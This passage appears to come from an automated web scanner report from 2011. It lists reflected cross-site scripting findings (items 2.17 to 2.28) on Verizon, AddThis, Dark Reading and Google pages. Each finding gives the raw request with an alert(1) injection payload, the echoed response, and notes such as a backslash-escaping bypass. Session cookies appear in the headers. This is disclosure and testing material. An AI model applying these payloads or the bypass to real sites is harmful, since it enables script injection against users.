Confidence:	Certain
Host:	http://search.verizon.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e51d"><script>alert(1)</script>84948b9fe2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tp=l&rv=l&q=xss&search.x=0&search.y=0&9e51d"><script>alert(1)</script>84948b9fe2a=1 HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=xss%20sq~~~~

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:54 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 50777

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
<a href="http://search.verizon.com/?9e51d"><script>alert(1)</script>84948b9fe2a=1&market=94531+zz+CA&q=sss&rv=l&search.x=0&search.y=0&st=CA&tp=l&u1=q" style="font-weight: bold;">
...[SNIP]...

2.17. https://signin.verizon.com/sso/VOLPortalLogin [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/VOLPortalLogin

Issue detail

The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86b63"><script>alert(1)</script>b4d89556348 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sso/VOLPortalLogin?loginType=dotcom&module=AIAW&generic=true&app=myvz2&goto=https%253a%252f%252fsignin.verizon.com%252fsso%252fProcessLoginServlet%253ftarget%253dhttps%25253a%25252f%25252fwww22.verizon.com%25252fforyourhome%25252fMyAccount%25252fProtected%25252fCommon%25252fergcon.aspx%25253fTarget%25253d86b63"><script>alert(1)</script>b4d89556348 HTTP/1.1
Host: signin.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; VZSSOCOM_SESSIONID=3G0bTlLf1jTwG4vn19Q6hKvqw4QjypJ4qhDWfmfDPR62TbVp8RjL!419329926!559599265; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:52 GMT
Server: Apache
Content-Length: 621
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<html>

<body>

<form name="loginPoster" method="post" target="_top">

<input type="hidden" name="postURL" value="https://signin.verizon.com/sso/RememberMeServlet?target=https%3a%2f%2fsignin.verizon.com%2fsso%2fProcessLoginServlet%3ftarget%3dhttps%253a%252f%252fwww22.verizon.com%252fforyourhome%252fMyAccount%252fProtected%252fCommon%252fergcon.aspx%253fTarget%253d86b63"><script>alert(1)</script>b4d89556348">
...[SNIP]...

2.18. http://syndicate.verizon.net/ads/js.ashx [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicate.verizon.net
Path:	/ads/js.ashx

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0c04\'%3balert(1)//bc1633a1cdc was submitted in the page parameter. This input was echoed as b0c04\\';alert(1)//bc1633a1cdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=business2.vz.net/out/homepageb0c04\'%3balert(1)//bc1633a1cdc&pos=Top1,x13 HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2728
Date: Mon, 05 Sep 2011 22:35:56 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'business2.vz.net/out/homepageb0c04\\';alert(1)//bc1633a1cdc';
OAS_listpos = 'Top1,x13';
OAS_query = 'popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vason
...[SNIP]...

2.19. http://syndicate.verizon.net/ads/js.ashx [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicate.verizon.net
Path:	/ads/js.ashx

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2f22\'%3balert(1)//e8dc7888daf was submitted in the pos parameter. This input was echoed as e2f22\\';alert(1)//e8dc7888daf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Request

GET /ads/js.ashx?page=business2.vz.net/out/homepage&pos=Top1,x13e2f22\'%3balert(1)//e8dc7888daf HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2728
Date: Mon, 05 Sep 2011 22:35:58 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'business2.vz.net/out/homepage';
OAS_listpos = 'Top1,x13e2f22\\';alert(1)//e8dc7888daf';
OAS_query = 'popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&vis
...[SNIP]...

2.20. http://syndicate.verizon.net/ads/scripthandler.ashx [source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicate.verizon.net
Path:	/ads/scripthandler.ashx

Issue detail

The value of the source request parameter is copied into a JavaScript rest-of-line comment. The payload 53953%0aalert(1)//1467c73ae8e was submitted in the source parameter. This input was echoed as 53953
alert(1)//1467c73ae8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ads/scripthandler.ashx?source=business2.vz.net/out/homepage53953%0aalert(1)//1467c73ae8e HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1167
Date: Mon, 05 Sep 2011 22:36:05 GMT
Connection: close

// using application id: business2.vz.net
// using page id: out/homepage53953
alert(1)//1467c73ae8e

           var vz_included_elements = new Array();    // remember everything we've added to the DOM
                                                   // this will redefine the existing array

           function vz_include_script( filename, defer )

...[SNIP]...

2.21. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://verizonwireless.tt.omtrdc.net
Path:	/m2/verizonwireless/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload b9ca7<script>alert(1)</script>c0a655518a0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1315278871714-190238&mboxPage=1315278871714-190238&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=853&browserTimeOffset=-300&colorDepth=16&mboxCount=3&mbox=Prospects_LeftOfferToutb9ca7<script>alert(1)</script>c0a655518a0&mboxId=0&mboxTime=1315260876061&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 219
Date: Mon, 05 Sep 2011 22:15:22 GMT
Server: Test & Target

mboxFactories.get('default').get('Prospects_LeftOfferToutb9ca7<script>alert(1)</script>c0a655518a0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315278871714-190238.19");

2.22. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver [nimlet parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://webmail.verizonemail.net
Path:	/webmail/servlet/HttpNimletDriver

Issue detail

The value of the nimlet request parameter is copied into the HTML document as plain text between tags. The payload 41149<script>alert(1)</script>08f450c0fce was submitted in the nimlet parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet41149<script>alert(1)</script>08f450c0fce&site=B HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizonemail.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:42:00 GMT
Content-length: 2462
Content-type: text/html

<html><head>
<title>
Sun ONE Application Server - HTTP Status 500 Error
</title>
<STYLE><!--
BODY{font-family : verdana, geneva, helvetica, arial, sans-serif; color : black;background-color : white;}

...[SNIP]...
<pre>javax.servlet.ServletException: The requested Nimlet( LoginNimlet41149<script>alert(1)</script>08f450c0fce) is not available
   at com.nitido.nimbox.http.HttpNimletDriver.getNimlet(Unknown Source)
   at com.nitido.nimbox.http.SkinDispatcherForNimlet.dispatch(Unknown Source)
   at com.nitido.nimbox.http.HttpNimle
...[SNIP]...

2.23. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload abfb2<script>alert(1)</script>68ca5a7c143 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpabfb2<script>alert(1)</script>68ca5a7c143 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 05 Sep 2011 22:36:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1333
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpabfb2<script>alert(1)</script>68ca5a7c143</strong>
...[SNIP]...

2.24. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ebd8"-alert(1)-"6e68519e30a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php5ebd8"-alert(1)-"6e68519e30a HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 05 Sep 2011 22:36:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1307
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php5ebd8"-alert(1)-"6e68519e30a";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.25. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdd6e"-alert(1)-"0f82dbf2642 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php/bdd6e"-alert(1)-"0f82dbf2642 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92806

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/bdd6e"-alert(1)-"0f82dbf2642";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.26. http://www.darkreading.com/security/attacks/showArticle.jhtml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.darkreading.com
Path:	/security/attacks/showArticle.jhtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c396"><script>alert(1)</script>17fa94993a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /security/attacks8c396"><script>alert(1)</script>17fa94993a5/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=aHFlcnBxYTE5ZmU2aGVmdmF0OWFxM25vYzE%3D; expires=Mon, 05-Sep-2011 12:36:32 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
tp%3A%2F%2Fwww.darkreading.com%2Fsecurity%2Fattacks8c396%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E17fa94993a5%2F0&siteId=162801002&successfulLoginRedirect=http://www.darkreading.com/security/attacks8c396"><script>alert(1)</script>17fa94993a5/0">
...[SNIP]...

2.27. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a33e8(a)f8a98d8a3f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /advanced_search?a33e8(a)f8a98d8a3f7=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:16 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
",d,k)};})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?a33e8(a)f8a98d8a3f7\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.28. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fedfb'-alert(1)-'12fea1b1512 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?fedfb'-alert(1)-'12fea1b1512=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; 